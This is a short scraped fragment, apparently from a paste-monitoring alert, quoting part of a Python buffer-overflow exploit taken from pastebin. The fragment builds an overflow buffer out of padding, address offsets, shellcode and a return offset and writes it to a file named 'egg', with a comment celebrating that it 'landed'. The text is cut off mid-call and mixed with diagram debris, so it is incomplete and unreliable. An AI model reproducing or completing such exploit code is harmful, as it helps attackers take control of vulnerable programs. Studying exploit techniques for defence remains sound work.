Detected 7 occurrence(s) of ‘shellcode’: -----------+ +--------------------+ | | | | | V | | V | ''' buff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;) print 'buff sz: %s' % len(buff) open('egg','w').write(buff Source: http://pastebin.com/raw.php?i=1ykxcrQh
↧